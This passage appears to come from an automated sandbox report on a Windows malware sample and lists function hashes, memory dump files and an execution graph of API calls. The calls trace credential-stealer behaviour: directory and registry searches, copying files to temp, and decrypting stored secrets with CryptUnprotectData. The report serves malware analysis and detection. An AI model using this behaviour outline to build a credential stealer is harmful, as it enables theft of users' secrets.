                        • Opcode ID: 039acd9b67e764601ba82469f9de9df4a99d24579219de54cf11ac1d4119bc91
                        • Instruction ID: 863a443b315763638c31dffea77139fa9fc7248c2f9879795720f54bbf800da4
                        • Opcode Fuzzy Hash: 039acd9b67e764601ba82469f9de9df4a99d24579219de54cf11ac1d4119bc91
                        • Instruction Fuzzy Hash: 4F115C2020C941ADD321D37CCA08914BFA59B4F72075802FBD6915A0C6CA79454AEF97
                        Function 004022F7 Relevance: .1, Instructions: 67COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1743014328.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1742984337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1743039242.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1743136047.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3e540363add078f276303d02989b505c159875bf8d0edc9c9c36215123116058
                        • Instruction ID: 0c8bb5551e2abd97a64ae9c19d193427848800bdc9eaee9e975189e24a5225cd
                        • Opcode Fuzzy Hash: 3e540363add078f276303d02989b505c159875bf8d0edc9c9c36215123116058
                        • Instruction Fuzzy Hash: 56112C2020C581EDD321D27CCA09514BF959B4F72475801FBD691690C6DA79454AEB9B
                        Function 00402321 Relevance: .1, Instructions: 57COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1743014328.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1742984337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1743039242.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1743136047.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 25919fc75364af992eb4b4042875d07686e0c12065a18c89e44093fc2b7c95b2
                        • Instruction ID: f976abf0b506ce6ff8f37bbd7c8af7624669eab2ab4b5b0fb9c0d747e7254d45
                        • Opcode Fuzzy Hash: 25919fc75364af992eb4b4042875d07686e0c12065a18c89e44093fc2b7c95b2
                        • Instruction Fuzzy Hash: 1601472124C991BCE331E33CC908904BFE69B4FB6475802FAD2A15A0C7DA214589DFE7
                        Function 004025D3 Relevance: .1, Instructions: 52COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1743014328.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1742984337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1743039242.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1743136047.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: f4027c6423f46035466e643bdd863a4de9ba613b5b2dc0b913ca9580a9ba2c0d
                        • Instruction ID: c5c43ab6752ee8d18fcb74b59ff98ad39f6596117cd62c5b2c77ced72334e6aa
                        • Opcode Fuzzy Hash: f4027c6423f46035466e643bdd863a4de9ba613b5b2dc0b913ca9580a9ba2c0d
                        • Instruction Fuzzy Hash: B111E2321002609FDF21AF24C49569AFBB2FF4530C375A188C9969B111E722AD8FCB91
                        Function 00402920 Relevance: .0, Instructions: 44COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1743014328.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1742984337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1743039242.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1743136047.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 79cd9034bfff8985795d7f01a2b5bacfc6e9aaff332886851db4d16c3fecaafc
                        • Instruction ID: 20a1f56e34deb81daffe23ddf7f3a634b4938193a6ef7f98b4fa68dc7b801d93
                        • Opcode Fuzzy Hash: 79cd9034bfff8985795d7f01a2b5bacfc6e9aaff332886851db4d16c3fecaafc
                        • Instruction Fuzzy Hash: 09F078B2A04347EBD715AAF482844AEBB20A740731BA4265BD5E6E62E1D779C504D704
                        Function 00402686 Relevance: .0, Instructions: 37COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1743014328.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                        • Associated: 00000000.00000002.1742984337.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1743039242.0000000000404000.00000080.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1743136047.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_400000_171687721070698e62c2170d003b444ecf0c5f6af81f98e26a56198e118930566be818.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1e7a0acffb87ace860446896612c735c16b272113d31e621940bc7827f3f290d
                        • Instruction ID: c48700b05c06e988df87cd580ca5e4308363d13747befdac9a33251d9afddee9
                        • Opcode Fuzzy Hash: 1e7a0acffb87ace860446896612c735c16b272113d31e621940bc7827f3f290d
                        • Instruction Fuzzy Hash: 8EF0227101036187CF18AB389498198BBA1EE46668798079EDDA2770D2E327A4A9CB90

                        Execution Graph

                        Execution Coverage:3.7%
                        Dynamic/Decrypted Code Coverage:50.5%
                        Signature Coverage:25.1%
                        Total number of Nodes:786
                        Total number of Limit Nodes:83
                        execution_graph 28128 3016d01 _allmul 27284 3069304 27286 3069344 27284->27286 27285 3069584 27285->27285 27286->27285 27287 30694da LoadLibraryA 27286->27287 27291 306951f VirtualProtect VirtualProtect 27286->27291 27288 30694f1 27287->27288 27288->27286 27290 3069503 GetProcAddress 27288->27290 27290->27288 27292 3069519 27290->27292 27291->27285 28024 3036f06 24 API calls 27368 3004108 27371 3004045 27368->27371 27390 3003fdc 27371->27390 27374 3003fdc 50 API calls 27375 300407a 27374->27375 27376 3003fdc 50 API calls 27375->27376 27377 300408d 27376->27377 27378 3003fdc 50 API calls 27377->27378 27379 30040a0 27378->27379 27380 3003fdc 50 API calls 27379->27380 27381 30040b3 27380->27381 27382 3003fdc 50 API calls 27381->27382 27383 30040c6 27382->27383 27384 3003fdc 50 API calls 27383->27384 27385 30040d9 27384->27385 27386 3003fdc 50 API calls 27385->27386 27387 30040ec 27386->27387 27388 3003fdc 50 API calls 27387->27388 27389 30040ff 27388->27389 27391 3001afe 10 API calls 27390->27391 27392 3003fea 27391->27392 27393 300403f 27392->27393 27394 300199d 9 API calls 27392->27394 27393->27374 27395 3003ff8 27394->27395 27401 3003ed9 27395->27401 27399 3004038 27400 3001011 3 API calls 27399->27400 27400->27393 27402 3003fd1 27401->27402 27403 3003eed 27401->27403 27402->27399 27423 3001d4a 27402->27423 27403->27402 27451 3001000 GetProcessHeap RtlAllocateHeap 27403->27451 27405 3003f01 PathCombineW FindFirstFileW 27406 3003f27 27405->27406 27407 3003fca 27405->27407 27408 3003f32 lstrcmpiW 27406->27408 27409 3003f78 lstrcmpiW 27406->27409 27452 3001000 GetProcessHeap RtlAllocateHeap 27406->27452 27410 3001011 3 API calls 27407->27410 27411 3003faf FindNextFileW 27408->27411 27412 3003f42 lstrcmpiW 27408->27412 27409->27406 27409->27411 27410->27402 27411->27406 27414 3003fc3 FindClose 27411->27414 27412->27411 27415 3003f56 27412->27415 27414->27407 27469 3001000 GetProcessHeap RtlAllocateHeap 27415->27469 27416 3003f92 PathCombineW 27453 3003e04 27416->27453 27418 3003f60 PathCombineW 27420 3003ed9 23 API calls 27418->27420 27421 3003f76 27420->27421 27422 3001011 3 API calls 27421->27422 27422->27411 27424 3001d62 27423->27424 27425 3001eb4 27423->27425 27424->27425 27496 30019b4 27424->27496 27425->27399 27428 3001d79 27430 3001953 6 API calls 27428->27430 27429 3001d8b 27431 3001953 6 API calls 27429->27431 27432 3001d83 27430->27432 27431->27432 27432->27425 27433 3001da3 FindFirstFileW 27432->27433 27434 3001ead 27433->27434 27440 3001dba 27433->27440 27435 3001011 3 API calls 27434->27435 27435->27425 27436 3001dc5 lstrcmpiW 27438 3001ddd lstrcmpiW 27436->27438 27439 3001e8e FindNextFileW 27436->27439 27437 3001953 6 API calls 27437->27440 27438->27439 27445 3001df5 27438->27445 27439->27440 27441 3001ea2 FindClose 27439->27441 27440->27436 27440->27437 27442 300199d 9 API calls 27440->27442 27441->27434 27444 3001e54 lstrcmpiW 27442->27444 27443 30019b4 lstrlenW 27443->27445 27444->27445 27445->27443 27447 3001011 3 API calls 27445->27447 27448 3001953 6 API calls 27445->27448 27449 300199d 9 API calls 27445->27449 27450 3001d4a 12 API calls 27445->27450 27500 3001cf7 GetProcessHeap RtlAllocateHeap lstrlenW RtlComputeCrc32 27445->27500 27447->27439 27448->27445 27449->27445 27450->27445 27451->27405 27452->27416 27454 3001b6a 2 API calls 27453->27454 27455 3003e0f 27454->27455 27466 3003ec7 27455->27466 27470 3001c31 CreateFileW 27455->27470 27462 3003ebf 27463 3001011 3 API calls 27462->27463 27463->27466 27464 3003ea8 27468 3001011 3 API calls 27464->27468 27465 3003e6c RtlCompareMemory 27465->27464 27467 3003e7e CryptUnprotectData 27465->27467 27466->27421 27467->27464 27468->27462 27469->27418 27471 3001c53 GetFileSize 27470->27471 27472 3001c98 27470->27472 27473 3001c90 CloseHandle 27471->27473 27474 3001c63 27471->27474 27472->27466 27481 3002fb1 27472->27481 27473->27472 27493 3001000 GetProcessHeap RtlAllocateHeap 27474->27493 27476 3001c6b ReadFile 27477 3001c80 27476->27477 27478 3001c87 27476->27478 27477->27473 27477->27478 27479 3001011 3 API calls 27478->27479 27480 3001c8e 27479->27480 27480->27473 27482 3002fb8 StrStrIA 27481->27482 27486 3002ff2 27481->27486 27483 3002fcd lstrlen StrStrIA 27482->27483 27482->27486 27484 3002fe7 27483->27484 27483->27486 27494 300190b 6 API calls 27484->27494 27486->27466 27487 300123b lstrlen 27486->27487 27488 3001256 CryptStringToBinaryA 27487->27488 27489 300129b 27487->27489 27488->27489 27490 3001272 27488->27490 27489->27462 27489->27464 27489->27465 27495 3001000 GetProcessHeap RtlAllocateHeap 27490->27495 27492 300127e CryptStringToBinaryA 27492->27489 27493->27476 27494->27486 27495->27492 27497 30019d4 27496->27497 27498 30019bc 27496->27498 27497->27428 27497->27429 27498->27497 27499 30019c3 lstrlenW 27498->27499 27499->27497 27500->27445 28025 3025f08 102 API calls 27519 3002b15 27520 3001953 6 API calls 27519->27520 27521 3002b1f FindFirstFileW 27520->27521 27523 3002c5c 27521->27523 27531 3002b4e 27521->27531 27524 3001011 3 API calls 27523->27524 27525 3002c63 27524->27525 27527 3001011 3 API calls 27525->27527 27526 3002b59 lstrcmpiW 27528 3002b71 lstrcmpiW 27526->27528 27529 3002c3d FindNextFileW 27526->27529 27530 3002c6a 27527->27530 27528->27529 27528->27531 27529->27531 27532 3002c51 FindClose 27529->27532 27531->27526 27533 30019b4 lstrlenW 27531->27533 27534 300199d 9 API calls 27531->27534 27537 3001953 6 API calls 27531->27537 27542 300199d 9 API calls 27531->27542 27543 3001011 3 API calls 27531->27543 27532->27523 27533->27531 27535 3002bdf StrStrIW 27534->27535 27536 3002c10 StrStrIW 27535->27536 27540 3002bf1 27535->27540 27536->27540 27537->27531 27538 3001cf7 GetProcessHeap RtlAllocateHeap lstrlenW RtlComputeCrc32 27538->27540 27539 3001011 3 API calls 27539->27529 27540->27536 27540->27538 27540->27539 27544 300278e 41 API calls 27540->27544 27542->27531 27543->27531 27544->27536 28026 3026b14 memset memcpy _allmul 27545 3003717 27546 3001b6a 2 API calls 27545->27546 27548 300372e 27546->27548 27547 3003c23 27548->27547 27595 3001000 GetProcessHeap RtlAllocateHeap 27548->27595 27550 300376c GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 27551 30037a8 27550->27551 27552 300379e 27550->27552 27554 3054bec 89 API calls 27551->27554 27596 300349b 31 API calls 27552->27596 27557 30037b3 27554->27557 27555 3003c15 DeleteFileW 27556 3001011 3 API calls 27555->27556 27556->27547 27557->27555 27558 3003c0c 27557->27558 27597 3001000 GetProcessHeap RtlAllocateHeap 27557->27597 27559 3053848 76 API calls 27558->27559 27559->27555 27561 30037e3 27598 30202ec 94 API calls 27561->27598 27563 3003bcc 27603 301fb92 93 API calls 27563->27603 27565 3003bd9 lstrlen 27566 3003c05 27565->27566 27567 3003be5 27565->27567 27568 3001011 3 API calls 27566->27568 27604 3001798 lstrlen 27567->27604 27568->27558 27570 3003833 RtlCompareMemory 27571 3003a37 CryptUnprotectData 27570->27571 27579 30037ee 27570->27579 27571->27579 27573 3003bf3 27605 3001798 lstrlen 27573->27605 27575 3003bfc 27606 3001798 lstrlen 27575->27606 27577 3003867 RtlZeroMemory 27599 3001000 GetProcessHeap RtlAllocateHeap 27577->27599 27579->27563 27579->27570 27579->27571 27579->27577 27580 3001011 3 API calls 27579->27580 27581 3003b0f lstrlen 27579->27581 27583 3001000 GetProcessHeap RtlAllocateHeap 27579->27583 27584 3001fa7 19 API calls 27579->27584 27585 3003987 lstrlen 27579->27585 27589 3003ba3 lstrcat 27579->27589 27600 3002112 GetProcessHeap RtlAllocateHeap GetSystemTimeAsFileTime _alldiv wsprintfA 27579->27600 27601 3002112 GetProcessHeap RtlAllocateHeap GetSystemTimeAsFileTime _alldiv wsprintfA 27579->27601 27602 30202ec 94 API calls 27579->27602 27580->27579 27581->27579 27582 3003b21 lstrlen 27581->27582 27582->27579 27583->27579 27584->27579 27585->27579 27587 3003999 lstrlen 27585->27587 27587->27579 27588 3003b66 wsprintfA lstrlen 27588->27579 27588->27589 27589->27579 27591 30039de wsprintfA lstrlen 27592 3003a1b lstrcat 27591->27592 27593 3003a0d 27591->27593 27594 3001011 3 API calls 27592->27594 27593->27592 27594->27579 27595->27550 27596->27551 27597->27561 27598->27579 27599->27579 27600->27591 27601->27588 27602->27579 27603->27565 27604->27573 27605->27575 27606->27566 27655 300411b 27656 3004045 50 API calls 27655->27656 27657 300412b 27656->27657 27658 3004045 50 API calls 27657->27658 27659 300413b 27658->27659 28133 30184a7 30 API calls 28134 3009925 18 API calls 28030 304c322 27 API calls 28136 3010128 36 API calls 28032 300cb2a _allmul _allmul 28033 303072d 19 API calls 28139 302f130 22 API calls 28034 301ff32 21 API calls 28140 3019534 39 API calls 28037 3017b3d 18 API calls 28019 300413e 28020 3004045 50 API calls 28019->28020 28021 300414e 28020->28021 28039 3010f3e 60 API calls 28040 3026340 92 API calls 28141 302e141 18 API calls 28042 301f74d 18 API calls 28143 300a558 18 API calls 28144 302e558 22 API calls 28045 3037762 memset memset memcpy 28047 3027f67 24 API calls 28048 300ab68 22 API calls 28146 3035d6f 20 API calls 28147 301a16f 33 API calls 27954 3002f77 27955 3002e30 22 API calls 27954->27955 27956 3002f9a 27955->27956 27957 3002e30 22 API calls 27956->27957 27958 3002fab 27957->27958 28150 301c97b memcpy 28151 3027d8b _allrem memcpy 28053 301ab8b 19 API calls 28054 301cb91 18 API calls 28153 301fd97 19 API calls 28055 30213ca 88 API calls 28154 3001198 GetProcessHeap RtlAllocateHeap CryptBinaryToStringA CryptBinaryToStringA 28057 300bf9a _alldiv 27660 3001b9d 27661 3001bc1 27660->27661 27662 3001ba2 27660->27662 27662->27661 27663 3001ba9 GetFileAttributesW 27662->27663 27664 3001bb5 27663->27664 27747 300639e 27751 300b1e3 27747->27751 27771 300b1e5 27747->27771 27748 30063b2 27752 300b1e5 27751->27752 27753 300b214 27752->27753 27807 300aeea 27752->27807 27755 300b233 27753->27755 27770 300b28f 27753->27770 27825 300ae65 27753->27825 27755->27770 27791 300a7ae 27755->27791 27758 300b26d 27831 300a1c6 18 API calls 27758->27831 27759 300b2d6 27804 3006a5a 27759->27804 27762 300b2e8 27766 300b310 CreateFileMappingW 27762->27766 27762->27770 27767 300b32b MapViewOfFile 27766->27767 27768 300b37e 27766->27768 27767->27762 27767->27768 27832 300a1c6 18 API calls 27768->27832 27770->27748 27772 300b214 27771->27772 27773 300b20d 27771->27773 27775 300b233 27772->27775 27776 300ae65 22 API calls 27772->27776 27778 300b28f 27772->27778 27774 300aeea 27 API calls 27773->27774 27774->27772 27777 300a7ae 18 API calls 27775->27777 27775->27778 27776->27775 27781 300b267 27777->27781 27778->27748 27779 300b26d 27869 300a1c6 18 API calls 27779->27869 27780 300b2d6 27782 3006a5a 17 API calls 27780->27782 27781->27778 27781->27779 27781->27780 27783 300a67c 22 API calls 27781->27783 27789 300b2e8 27782->27789 27785 300b2be 27783->27785 27785->27779 27785->27780 27786 300b310 CreateFileMappingW 27787 300b32b MapViewOfFile 27786->27787 27788 300b37e 27786->27788 27787->27788 27787->27789 27870 300a1c6 18 API calls 27788->27870 27789->27778 27789->27786 27793 300a7c7 27791->27793 27792 300a805 27792->27758 27792->27759 27792->27770 27795 300a67c 27792->27795 27793->27792 27833 300a1c6 18 API calls 27793->27833 27796 300a6c1 27795->27796 27797 300a694 _alldiv _allmul 27795->27797 27834 300a33b SetFilePointer 27796->27834 27797->27796 27800 300a6f0 SetEndOfFile 27801 300a6d4 27800->27801 27802 300a6ee 27800->27802 27801->27802 27838 300a1c6 18 API calls 27801->27838 27802->27758 27802->27759 27805 305307c 17 API calls 27804->27805 27806 3006a65 27805->27806 27806->27762 27808 3006a81 memset 27807->27808 27809 300af01 27808->27809 27810 3006a81 memset 27809->27810 27824 300af07 27809->27824 27811 300af2a 27810->27811 27811->27824 27840 3007f07 27811->27840 27813 30552ae _allmul 27815 300afd9 27813->27815 27814 300af54 27814->27813 27814->27824 27816 300b87b 21 API calls 27815->27816 27817 300affa 27816->27817 27818 300b020 27817->27818 27819 300b000 27817->27819 27820 300ae65 22 API calls 27818->27820 27848 300a1c6 18 API calls 27819->27848 27822 300b01c 27820->27822 27822->27824 27843 300adcc 27822->27843 27824->27753 27827 300ae7a 27825->27827 27826 300ae83 27826->27755 27827->27826 27828 300a67c 22 API calls 27827->27828 27829 300aea5 27828->27829 27829->27826 27868 300a1c6 18 API calls 27829->27868 27831->27770 27832->27770 27833->27792 27835 300a36a 27834->27835 27837 300a390 27834->27837 27835->27837 27839 300a1c6 18 API calls 27835->27839 27837->27800 27837->27801 27838->27802 27839->27837 27849 3007ec7 27840->27849 27847 300ade4 27843->27847 27844 300ae5f 27844->27824 27847->27844 27854 300bafc 27847->27854 27865 300a39e 18 API calls 27847->27865 27848->27822 27850 3007ed4 27849->27850 27851 3007ed9 27849->27851 27850->27814 27853 3006e6a 17 API calls 27851->27853 27853->27850 27855 300b609 memset 27854->27855 27860 300bb14 27855->27860 27856 300bb3f GetFileAttributesW 27857 300bb4b 27856->27857 27856->27860 27859 300bb5b 27857->27859 27861 300bb7d 27857->27861 27858 300bb25 DeleteFileW 27858->27860 27858->27861 27866 300a1c6 18 API calls 27859->27866 27860->27856 27860->27858 27860->27859 27864 300bb1a 27860->27864 27867 300a2aa 17 API calls 27861->27867 27864->27847 27865->27847 27866->27864 27867->27864 27868->27826 27869->27778 27870->27778 28156 30111a0 43 API calls 28058 3028ba6 7 API calls 28059 30453ad memset memcpy memset memcpy 28060 30433b7 27 API calls 28061 30213ca 89 API calls 28158 3029dbc 25 API calls 28062 30373c4 22 API calls 27361 3009fc8 27363 3009fd3 27361->27363 27365 3009fd8 27361->27365 27362 3009ff4 HeapCreate 27362->27363 27364 300a004 27362->27364 27367 3007f70 17 API calls 27364->27367 27365->27362 27365->27363 27367->27363 28065 30213ca 89 API calls 28159 3053dc8 24 API calls 27636 30043d9 27643 3004317 _alloca_probe RegOpenKeyW 27636->27643 27639 3004317 25 API calls 27640 30043f5 27639->27640 27641 3004317 25 API calls 27640->27641 27642 3004403 27641->27642 27644 3004343 RegEnumKeyExW 27643->27644 27645 30043cf 27643->27645 27646 30043c4 RegCloseKey 27644->27646 27650 300436d 27644->27650 27645->27639 27646->27645 27647 3001953 6 API calls 27647->27650 27648 300199d 9 API calls 27648->27650 27650->27647 27650->27648 27651 3001011 3 API calls 27650->27651 27654 300418a 16 API calls 27650->27654 27652 300439b RegEnumKeyExW 27651->27652 27652->27650 27653 30043c3 27652->27653 27653->27646 27654->27650 28068 300ebd9 37 API calls 27665 30063dd 27668 300b87b 27665->27668 27666 30063f4 27669 300b88d memset 27668->27669 27676 300b8e5 27669->27676 27672 300ba3c 27672->27666 27673 300b965 CreateFileW 27673->27676 27676->27669 27676->27672 27676->27673 27677 300ba14 27676->27677 27679 300ba41 27676->27679 27683 300b609 27676->27683 27686 300b64b 18 API calls 27676->27686 27687 300bb9f 18 API calls 27676->27687 27688 300a2aa 17 API calls 27676->27688 27689 300a1c6 18 API calls 27677->27689 27691 30552ae 27679->27691 27680 300ba32 27690 3054db2 17 API calls 27680->27690 27695 300a08a 27683->27695 27685 300b60f 27685->27676 27686->27676 27687->27676 27688->27676 27689->27680 27690->27672 27692 30552bb 27691->27692 27693 30552d1 27692->27693 27703 303ba08 _allmul 27692->27703 27693->27672 27696 300a0a4 27695->27696 27698 300a0aa 27696->27698 27699 3006a81 27696->27699 27698->27685 27700 3006a8f 27699->27700 27701 3006aa4 27700->27701 27702 3006a95 memset 27700->27702 27701->27698 27702->27701 27703->27693 27704 30015dd 27705 3001600 27704->27705 27706 30015f3 lstrlen 27704->27706 27715 3001000 GetProcessHeap RtlAllocateHeap 27705->27715 27706->27705 27708 3001608 lstrcat 27709 3001644 27708->27709 27710 300163d lstrcat 27708->27710 27716 3001333 27709->27716 27710->27709 27713 3001011 3 API calls 27714 3001667 27713->27714 27715->27708 27739 3001000 GetProcessHeap RtlAllocateHeap 27716->27739 27718 3001357 27740 300106c lstrlen MultiByteToWideChar 27718->27740 27720 3001366 27741 30012a3 RtlZeroMemory 27720->27741 27723 30013b8 RtlZeroMemory 27727 30013ed 27723->27727 27724 3001011 3 API calls 27725 30015d2 27724->27725 27725->27713 27726 30015b5 27726->27724 27727->27726 27743 3001000 GetProcessHeap RtlAllocateHeap 27727->27743 27729 30014a7 wsprintfW 27731 30014c9 27729->27731 27730 30015a1 27732 3001011 3 API calls 27730->27732 27731->27730 27744 3001000 GetProcessHeap RtlAllocateHeap 27731->27744 27732->27726 27734 3001533 27735 300159a 27734->27735 27745 300104c VirtualAlloc 27734->27745 27737 3001011 3 API calls 27735->27737 27737->27730 27738 300158a RtlMoveMemory 27738->27735 27739->27718 27740->27720 27742 30012c5 27741->27742 27742->27723 27742->27726 27743->27729 27744->27734 27745->27738 28162 30099e1 strncmp 28163 300c9ea _allmul _alldiv 28165 30555eb IsProcessorFeaturePresent 28070 30213ca 72 API calls 28071 3019ff0 32 API calls 28167 30049f1 13 API calls 28168 300d1f7 memset _allmul _allmul 28003 30047fa 28010 300479c 28003->28010 28006 300479c 23 API calls 28007 3004813 28006->28007 28008 300479c 23 API calls 28007->28008 28009 300481f 28008->28009 28011 3001afe 10 API calls 28010->28011 28012 30047af 28011->28012 28013 30047f1 28012->28013 28014 300199d 9 API calls 28012->28014 28013->28006 28016 30047bf 28014->28016 28015 30047ea 28017 3001011 3 API calls 28015->28017 28016->28015 28018 3001d4a 18 API calls 28016->28018 28017->28013 28018->28016 28074 300ca01 _allmul _alldiv _allmul _alldiv 28169 3039000 28 API calls 28172 3045401 memset memcpy memcpy memset memcpy 27293 3004406 27298 3002e30 StrStrIW 27293->27298 27296 3002e30 22 API calls 27297 300443a 27296->27297 27299 3002e57 27298->27299 27300 3002ebc 27298->27300 27335 30019e5 27299->27335 27324 3001000 GetProcessHeap RtlAllocateHeap 27300->27324 27303 3002ed0 RegOpenKeyExW 27305 3002f68 27303->27305 27315 3002eee 27303->27315 27307 3001011 3 API calls 27305->27307 27306 3002f50 RegEnumKeyExW 27310 3002f5e RegCloseKey 27306->27310 27306->27315 27311 3002f6f 27307->27311 27309 3002e75 27312 3002eb5 27309->27312 27350 3001afe 27309->27350 27310->27305 27311->27296 27316 3001011 3 API calls 27312->27316 27315->27306 27320 3002e30 18 API calls 27315->27320 27323 3001011 3 API calls 27315->27323 27325 3001953 27315->27325 27330 300199d 27315->27330 27316->27300 27319 300199d 9 API calls 27322 3002e91 27319->27322 27320->27315 27321 3001011 3 API calls 27321->27312 27322->27321 27323->27315 27324->27303 27326 3001964 lstrlenW lstrlenW 27325->27326 27358 3001000 GetProcessHeap RtlAllocateHeap 27326->27358 27329 3001986 lstrcatW lstrcatW 27329->27315 27331 3001953 6 API calls 27330->27331 27332 30019a6 27331->27332 27333 3001011 3 API calls 27332->27333 27334 30019af 27333->27334 27334->27315 27336 30019f7 27335->27336 27337 30019fa RegOpenKeyExW 27335->27337 27336->27337 27338 3001aa2 27337->27338 27339 3001a28 RegQueryValueExW 27337->27339 27340 3001ab9 27338->27340 27342 30019e5 5 API calls 27338->27342 27341 3001a94 RegCloseKey 27339->27341 27343 3001a46 27339->27343 27340->27300 27349 3001bc5 10 API calls 27340->27349 27341->27338 27341->27340 27342->27340 27343->27341 27359 3001000 GetProcessHeap RtlAllocateHeap 27343->27359 27345 3001a61 RegQueryValueExW 27346 3001a8b 27345->27346 27347 3001a7f 27345->27347 27348 3001011 3 API calls 27346->27348 27347->27341 27348->27347 27349->27309 27360 3001000 GetProcessHeap RtlAllocateHeap 27350->27360 27352 3001b0d SHGetFolderPathW 27353 3001b20 27352->27353 27357 3001b63 27352->27357 27354 3001011 3 API calls 27353->27354 27355 3001b28 27354->27355 27356 30019e5 9 API calls 27355->27356 27355->27357 27356->27355 27357->27319 27357->27322 27358->27329 27359->27345 27360->27352 27501 300a40e 27504 300a426 27501->27504 27511 300a4a2 27501->27511 27502 300a469 memcpy 27502->27511 27503 300a4cc ReadFile 27506 300a524 27503->27506 27503->27511 27504->27502 27505 300a44a memcpy 27504->27505 27504->27511 27507 300a45d 27505->27507 27515 300a2aa 17 API calls 27506->27515 27509 300a532 27509->27507 27510 300a53e memset 27509->27510 27510->27507 27511->27503 27511->27506 27512 300a501 27511->27512 27514 300a1c6 18 API calls 27512->27514 27514->27507 27515->27509 28077 3020e0c 22 API calls 28176 3005818 _alldiv _allrem _allmul 28080 302f21c 23 API calls 28178 303e024 93 API calls 28181 300482b 14 API calls 27903 300f433 27904 300f445 27903->27904 27909 30123b9 27904->27909 27907 300f47c 27908 300f490 27907->27908 27917 300e206 58 API calls 27907->27917 27910 30123d3 27909->27910 27912 3012473 27909->27912 27913 3012431 27910->27913 27921 3013451 43 API calls 27910->27921 27912->27907 27913->27912 27918 30063f7 27913->27918 27915 301240f 27915->27913 27922 301235a 17 API calls 27915->27922 27917->27908 27920 300bafc 20 API calls 27918->27920 27919 3006400 27919->27912 27920->27919 27921->27915 27922->27913 28185 301943d 34 API calls 27161 3003c40 27197 3001b6a 27161->27197 27163 3003c50 27164 3003dfa 27163->27164 27203 3001000 GetProcessHeap RtlAllocateHeap 27163->27203 27166 3003c62 GetTempPathW GetTempFileNameW DeleteFileW CopyFileW 27204 3054bec 27166->27204 27168 3003dec DeleteFileW 27215 3001011 27168->27215 27170 3003c9a 27170->27168 27171 3003de3 27170->27171 27220 3001000 GetProcessHeap RtlAllocateHeap 27170->27220 27228 3053848 27171->27228 27174 3003cce 27221 30202ec 94 API calls 27174->27221 27176 3003da8 27224 301fb92 93 API calls 27176->27224 27177 3001fa7 19 API calls 27189 3003cd9 27177->27189 27179 3003db1 lstrlen 27180 3003db9 27179->27180 27181 3003ddc 27179->27181 27225 3001798 lstrlen 27180->27225 27183 3001011 3 API calls 27181->27183 27183->27171 27184 3003dc8 27226 3001798 lstrlen 27184->27226 27186 3003d2b lstrlen 27187 3003d35 lstrlen 27186->27187 27186->27189 27187->27189 27188 3003dd2 27227 3001798 lstrlen 27188->27227 27189->27176 27189->27177 27189->27186 27222 3001000 GetProcessHeap RtlAllocateHeap 27189->27222 27223 30202ec 94 API calls 27189->27223 27193 3003d46 wsprintfA lstrlen 27194 3003d71 27193->27194 27195 3003d83 lstrcat 27193->27195 27194->27195 27196 3001011 3 API calls 27195->27196 27196->27189 27198 3001b99 27197->27198 27199 3001b6f 27197->27199 27198->27163 27199->27198 27200 3001b76 CreateFileW 27199->27200 27201 3001b95 27200->27201 27202 3001b8d FindCloseChangeNotification 27200->27202 27201->27163 27202->27201 27203->27166 27231 305307c 27204->27231 27206 3054c01 27213 3054c44 27206->27213 27241 301c54d memset 27206->27241 27208 3054c18 27242 301c871 21 API calls 27208->27242 27210 3054c2a 27243 301c518 19 API calls 27210->27243 27212 3054c33 27212->27213 27244 305486f 89 API 